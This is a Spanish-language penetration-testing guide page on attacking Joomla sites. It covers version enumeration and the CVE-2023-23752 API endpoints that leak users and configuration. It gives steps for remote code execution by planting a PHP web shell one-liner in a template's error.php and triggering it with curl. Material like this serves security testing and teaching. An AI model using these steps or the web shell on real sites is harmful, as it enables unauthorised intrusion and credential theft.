Joomla
Joomla Statistics
Joomla recopila algunas estadísticas de uso anónimas, como la descomposición de las versiones de Joomla, PHP y bases de datos, y los sistemas operativos de servidor en uso en las instalaciones de Joomla. Estos datos se pueden consultar a través de su API pública.
Enumeración
Descubrimiento/Recopilación de Información
Verifica el meta
robots.txt
README.txt
Versión
En /administrator/manifests/files/joomla.xml puedes ver la versión.
En /language/en-GB/en-GB.xml puedes obtener la versión de Joomla.
En plugins/system/cache/cache.xml puedes ver una versión aproximada.
Automático
In 80,443 - La metodología de pentesting web es una sección sobre escáneres de CMS que pueden escanear Joomla.
Divulgación de Información No Autenticada a través de API:
Las versiones de 4.0.0 a 4.2.7 son vulnerables a la divulgación de información no autenticada (CVE-2023-23752) que volcará credenciales y otra información.
Usuarios:
http://<host>/api/v1/users?public=true
Archivo de Configuración:
http://<host>/api/index.php/v1/config/application?public=true
Módulo MSF: scanner/http/joomla_api_improper_access_checks
o script ruby: 51334
Fuerza Bruta
Puedes usar este script para intentar realizar un ataque de fuerza bruta en el inicio de sesión.
RCE
Si lograste obtener credenciales de administrador, puedes RCE dentro de él agregando un fragmento de código PHP para obtener RCE. Podemos hacer esto personalizando una plantilla.
Haz clic en
Templates
en la parte inferior izquierda bajoConfiguration
para abrir el menú de plantillas.Haz clic en un nombre de plantilla. Elijamos
protostar
bajo el encabezado de columnaTemplate
. Esto nos llevará a la páginaTemplates: Customise
.Finalmente, puedes hacer clic en una página para abrir el código fuente. Elijamos la página
error.php
. Agregaremos un PHP one-liner para obtener ejecución de código de la siguiente manera:system($_GET['cmd']);
Guardar y cerrar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
JoomSploit: Script de explotación de Joomla que eleva XSS a RCE u otras vulnerabilidades críticas. Para más información, consulta esta publicación. Proporciona soporte para versiones de Joomla 5.X.X, 4.X.X y 3.X.X, y permite:
Escalación de privilegios: Crea un usuario en Joomla.
(RCE) Edición de plantillas integradas: Edita plantillas integradas en Joomla.
(Personalizado) Explotaciones personalizadas: Explotaciones personalizadas para complementos de Joomla de terceros.
Last updated